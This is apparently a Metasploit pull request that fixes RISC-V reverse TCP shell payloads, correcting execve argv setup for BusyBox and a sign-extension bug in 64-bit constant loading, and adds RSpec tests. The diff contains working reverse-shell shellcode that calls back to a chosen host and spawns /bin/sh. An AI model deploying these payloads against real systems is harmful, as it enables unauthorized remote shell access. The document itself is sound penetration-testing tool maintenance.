### PR TITLE
Fixes two bugs in the single shell riscv payloads

### DIFF
--- a/modules/payloads/singles/linux/riscv32le/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/riscv32le/shell_reverse_tcp.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 156
+  CachedSize = 164
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
@@ -116,15 +116,18 @@ module MetasploitModule
       0x00000073,                               # ecall
       0xfe0598e3,                               # bnez a1,100b0 <c_dup>
 
-      # execve("/bin/sh", NULL, NULL);
+      # execve("/bin/sh", ["/bin/sh", NULL], NULL);
+      # BusyBox uses argv[0] to select its applet; NULL argv causes "applet not found".
       0x0dd00893,                               # li a7,221
       *load_const_into_reg32(0x6e69622f, 5),    # "/bin"
-      0x00512023,                               # sw t0,0(sp)
+      0x00512023,                               # sw t0,0(sp)      # sp[0..3] = "/bin"
       *load_const_into_reg32(0x0068732f, 5),    # "/sh\0"
-      0x00512223,                               # sw t0,4(sp)
-      0x00010513,                               # mv a0,sp     # path = /bin/sh
-      0x00000593,                               # li a1,0      # argv = NULL
-      0x00000613,                               # li a2,0      # envp = NULL
+      0x00512223,                               # sw t0,4(sp)      # sp[4..7] = "/sh\0"
+      0x00010513,                               # mv a0,sp          # a0 = path = "/bin/sh"
+      0x00212423,                               # sw sp,8(sp)       # argv[0] = &path
+      0x00012623,                               # sw zero,12(sp)    # argv[1] = NULL
+      0x00810593,                               # addi a1,sp,8      # a1 = argv
+      0x00000613,                               # li a2,0           # envp = NULL
       0x00000073                                # ecall
     ].pack('V*')
 

--- a/modules/payloads/singles/linux/riscv64le/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/riscv64le/shell_reverse_tcp.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 140
+  CachedSize = 160
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
@@ -71,8 +71,19 @@ module MetasploitModule
     (funct7 << 25) | (rs2 << 20) | (rs1 << 15) | (funct3 << 12) | (rd << 7) | opcode
   end
 
-  # Emit RISC-V instruction words that build an arbitrary 64-bit constant in a chosen register using SLLI+LUI+ADDI
-  # Note: modifies x6 register
+  # Encode a RISC-V SRLI (Shift Right Logical Immediate) instruction
+  def encode_srli(rd, rs1, shamt)
+    opcode = 0b0010011
+    funct3 = 0b101
+    funct6 = 0b000000
+    ((funct6 & 0x3f) << 26) | ((shamt & 0x3f) << 20) |
+      (rs1 << 15) | (funct3 << 12) | (rd << 7) | opcode
+  end
+
+  # Emit RISC-V instruction words that build an arbitrary 64-bit constant in a chosen register.
+  # Note: modifies x6 (t1) register.
+  # Uses slli+srli to zero-extend the low half so that sign-extended bits from
+  # load_const_into_reg32 do not corrupt the high half after the OR.
   def load_const_into_reg64(const, rd)
     raise ArgumentError, "Constant '#{const}' is #{const.class}; not Integer" unless const.is_a?(Integer)
 
@@ -80,16 +91,16 @@ module MetasploitModule
 
     raise ArgumentError, "Constant #{const} is outside range 0..#{max_const}" unless const.between?(0, max_const)
 
-    # Split into 32‑bit halves
     hi = const >> 32
     lo = const & 0xFFFF_FFFF
 
-    # Load high half
     [
       *load_const_into_reg32(hi, rd),
-      *encode_slli(rd, rd, 32),
+      encode_slli(rd, rd, 32),
       *load_const_into_reg32(lo, 6),
-      *encode_or(rd, rd, 6),
+      encode_slli(6, 6, 32), # zero-extend lo: clear upper bits from sign extension
+      encode_srli(6, 6, 32),
+      encode_or(rd, rd, 6),
     ]
   end
 
@@ -125,7 +136,7 @@ module MetasploitModule
 
     shellcode = [
       # prepare stack
-      0xff010113, # addi sp,sp,-16
+      0xfe010113, # addi sp,sp,-32
 
       # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
       *load_const_into_reg32(SYS_SOCKET, 17),       # li a7,198  # SYS_socket
@@ -153,7 +164,8 @@ module MetasploitModule
       0x00000073,                                   # ecall
       0xfe0598e3,                                   # bnez a1,100c8 <c_dup>
 
-      # execve("/bin/sh", NULL, NULL);
+      # execve("/bin/sh", ["/bin/sh", NULL], NULL);
+      # BusyBox uses argv[0] to select its applet; NULL argv causes "applet not found".
       *load_const_into_reg32(SYS_EXECVE, 17),       # SYS_execve
       0x34399537,                                   # lui a0,0x34399
       0x7b75051b,                                   # addiw a0,a0,1975
@@ -161,8 +173,11 @@ module MetasploitModule
       0x34b50513,                                   # addi a0,a0,843
       0x00d51513,                                   # slli a0,a0,0xd
       0x22f50513,                                   # addi a0,a0,559
-      0x00a13023,                                   # sd a0,0(sp)
-      0x00010513,                                   # mv a0,sp
+      0x00a13023,                                   # sd a0,0(sp)      # sp[0..7] = "/bin/sh\0"
+      0x00010513,                                   # mv a0,sp          # a0 = path
+      0x00213423,                                   # sd sp,8(sp)       # argv[0] = &path
+      0x00013823,                                   # sd zero,16(sp)    # argv[1] = NULL
+      0x00810593,                                   # addi a1,sp,8      # a1 = argv
       0x00000073                                    # ecall
     ].pack('V*')
 

--- a/spec/modules/payloads/singles/linux/riscv32le/shell_reverse_tcp_spec.rb
+++ b/spec/modules/payloads/singles/linux/riscv32le/shell_reverse_tcp_spec.rb
@@ -12,7 +12,7 @@ RSpec.describe 'modules/payloads/singles/linux/riscv32le/shell_reverse_tcp' do
   end
 
   before(:each) do
-    subject.datastore.merge!('LHOST' => '127.0.0.1', 'LPORT' => '4444')
+    subject.datastore.merge!('LHOST' => '192.0.2.1', 'LPORT' => '4444')
   end
 
   describe '#generate' do
@@ -27,7 +27,7 @@ RSpec.describe 'modules/payloads/singles/linux/riscv32le/shell_reverse_tcp' do
 
     it 'encodes LHOST in the shellcode' do
       raw_default = subject.generate
-      subject.datastore['LHOST'] = '1.2.3.4'
+      subject.datastore['LHOST'] = '192.0.2.2'
       raw_other = subject.generate
       # LHOST is embedded in LUI/ADDI instruction words, not as raw bytes,
       # so verify that a different LHOST produces different shellcode.

--- a/spec/modules/payloads/singles/linux/riscv32le/shell_reverse_tcp_spec.rb
+++ b/spec/modules/payloads/singles/linux/riscv32le/shell_reverse_tcp_spec.rb
@@ -1,0 +1,61 @@
+require 'spec_helper'
+
+RSpec.describe 'modules/payloads/singles/linux/riscv32le/shell_reverse_tcp' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  let(:subject) do
+    load_and_create_module(
+      module_type: 'payload',
+      reference_name: 'linux/riscv32le/shell_reverse_tcp',
+      ancestor_reference_names: ['singles/linux/riscv32le/shell_reverse_tcp']
+    )
+  end
+
+  before(:each) do
+    subject.datastore.merge!('LHOST' => '127.0.0.1', 'LPORT' => '4444')
+  end
+
+  describe '#generate' do
+    it 'returns a non-empty binary string' do
+      expect(subject.generate).not_to be_empty
+    end
+
+    it 'generates a payload matching CachedSize' do
+      # described_class is nil for string-described examples; use subject.class
+      expect(subject.generate.bytesize).to eq(subject.class::CachedSize)
+    end
+
+    it 'encodes LHOST in the shellcode' do
+      raw_default = subject.generate
+      subject.datastore['LHOST'] = '1.2.3.4'
+      raw_other = subject.generate
+      # LHOST is embedded in LUI/ADDI instruction words, not as raw bytes,
+      # so verify that a different LHOST produces different shellcode.
+      expect(raw_default).not_to eq(raw_other)
+    end
+
+    it 'encodes LPORT in the shellcode' do
+      raw_default = subject.generate
+      subject.datastore['LPORT'] = '9999'
+      raw_other = subject.generate
+      expect(raw_default).not_to eq(raw_other)
+    end
+
+    it 'sets up argv[0] pointing to the path (not NULL) for BusyBox compatibility' do
+      raw = subject.generate
+      # sw sp,8(sp)   — stores &path as argv[0]
+      expect(raw).to include([0x00212423].pack('V'))
+      # sw zero,12(sp) — NULL-terminates argv[]
+      expect(raw).to include([0x00012623].pack('V'))
+      # addi a1,sp,8  — a1 = argv
+      expect(raw).to include([0x00810593].pack('V'))
+    end
+
+    it 'does not pass NULL as argv to execve' do
+      raw = subject.generate
+      # li a1,0; li a2,0; ecall — the unfixed null-argv sequence
+      null_argv_sequence = [0x00000593, 0x00000613, 0x00000073].pack('V*')
+      expect(raw).not_to include(null_argv_sequence)
+    end
+  end
+end

--- a/spec/modules/payloads/singles/linux/riscv64le/shell_reverse_tcp_spec.rb
+++ b/spec/modules/payloads/singles/linux/riscv64le/shell_reverse_tcp_spec.rb
@@ -12,7 +12,7 @@ RSpec.describe 'modules/payloads/singles/linux/riscv64le/shell_reverse_tcp' do
   end
 
   before(:each) do
-    subject.datastore.merge!('LHOST' => '127.0.0.1', 'LPORT' => '4444')
+    subject.datastore.merge!('LHOST' => '192.0.2.1', 'LPORT' => '4444')
   end
 
   describe '#generate' do
@@ -57,9 +57,9 @@ RSpec.describe 'modules/payloads/singles/linux/riscv64le/shell_reverse_tcp' do
       before(:each) { subject.datastore['LPORT'] = '4481' }
 
       it 'correctly encodes LHOST in the sockaddr despite the sign-extension hazard' do
-        subject.datastore['LHOST'] = '10.5.135.210'
+        subject.datastore['LHOST'] = '192.0.2.1'
         raw1 = subject.generate
-        subject.datastore['LHOST'] = '192.168.1.1'
+        subject.datastore['LHOST'] = '192.0.2.2'
         raw2 = subject.generate
         # If the bug were present, both would encode 0xffffffff for the IP
         # in the sockaddr and these payloads would be identical in that region.

--- a/spec/modules/payloads/singles/linux/riscv64le/shell_reverse_tcp_spec.rb
+++ b/spec/modules/payloads/singles/linux/riscv64le/shell_reverse_tcp_spec.rb
@@ -1,0 +1,76 @@
+require 'spec_helper'
+
+RSpec.describe 'modules/payloads/singles/linux/riscv64le/shell_reverse_tcp' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  let(:subject) do
+    load_and_create_module(
+      module_type: 'payload',
+      reference_name: 'linux/riscv64le/shell_reverse_tcp',
+      ancestor_reference_names: ['singles/linux/riscv64le/shell_reverse_tcp']
+    )
+  end
+
+  before(:each) do
+    subject.datastore.merge!('LHOST' => '127.0.0.1', 'LPORT' => '4444')
+  end
+
+  describe '#generate' do
+    it 'returns a non-empty binary string' do
+      expect(subject.generate).not_to be_empty
+    end
+
+    it 'generates a payload matching CachedSize' do
+      expect(subject.generate.bytesize).to eq(subject.class::CachedSize)
+    end
+
+    it 'encodes LPORT in the shellcode' do
+      raw_default = subject.generate
+      subject.datastore['LPORT'] = '9999'
+      raw_other = subject.generate
+      expect(raw_default).not_to eq(raw_other)
+    end
+
+    it 'sets up argv[0] pointing to the path (not NULL) for BusyBox compatibility' do
+      raw = subject.generate
+      # sd sp,8(sp)    — stores &path as argv[0] (64-bit pointer)
+      expect(raw).to include([0x00213423].pack('V'))
+      # sd zero,16(sp) — NULL-terminates argv[]
+      expect(raw).to include([0x00013823].pack('V'))
+      # addi a1,sp,8   — a1 = argv
+      expect(raw).to include([0x00810593].pack('V'))
+    end
+
+    it 'does not pass NULL as argv to execve' do
+      raw = subject.generate
+      # sd a0,0(sp); mv a0,sp; ecall — the unfixed sequence with no argv setup
+      null_argv_sequence = [0x00a13023, 0x00010513, 0x00000073].pack('V*')
+      expect(raw).not_to include(null_argv_sequence)
+    end
+
+    # load_const_into_reg64 sign-extension fix:
+    # When bit 31 of the low 32 bits of encoded_sockaddr is set, the old code
+    # let sign-extension from LUI+ADDI corrupt the high 32 bits (the host IP)
+    # after the OR.  The fix zero-extends via slli+srli before the OR.
+    context 'when LPORT causes bit 31 of the low sockaddr half to be set' do
+      # Port 4481 (0x1181) -> encoded_port = 0x8111 -> lo = 0x81110002 (bit 31 set)
+      before(:each) { subject.datastore['LPORT'] = '4481' }
+
+      it 'correctly encodes LHOST in the sockaddr despite the sign-extension hazard' do
+        subject.datastore['LHOST'] = '10.5.135.210'
+        raw1 = subject.generate
+        subject.datastore['LHOST'] = '192.168.1.1'
+        raw2 = subject.generate
+        # If the bug were present, both would encode 0xffffffff for the IP
+        # in the sockaddr and these payloads would be identical in that region.
+        expect(raw1).not_to eq(raw2)
+      end
+
+      it 'generates the zero-extension sequence (slli+srli) in the shellcode' do
+        raw = subject.generate
+        # slli t1,t1,32 followed immediately by srli t1,t1,32
+        expect(raw).to include([0x02031313, 0x02035313].pack('V*'))
+      end
+    end
+  end
+end


### PR DESCRIPTION
This fixes two bugs I found in the single command shell payloads for riscv while testing https://github.com/rapid7/metasploit-framework/pull/21235:
1. This fixes a temperamental bug in calling `execve`.  For some reason, on my version of Busybox for riscv32, passing `NULL` for `path` resulted in a crash.  I did not see that behavior on the riscv64 host, and I see that we pass `NULL` in on other IoT architectures, so I'm not sure why it seems to be an issue on this?  I imagine it is that we have not hit a busybox target?  RISCV32 is sort of an academic arch when it comes to running a Linux kernel, so 🤷 
I added the change to riscv64, but I am open to removing it there, though busybox is common enough on small stuff.
See https://stackoverflow.com/questions/19043700/busybox-in-embedded-linux-shows-applet-not-found
This change required an increase to the stack size.
2. There was a bug in the `load_const_into_reg64` method.  When using a value of 4481 for the LPORT, the `encode_or` sign-extended when it should not have.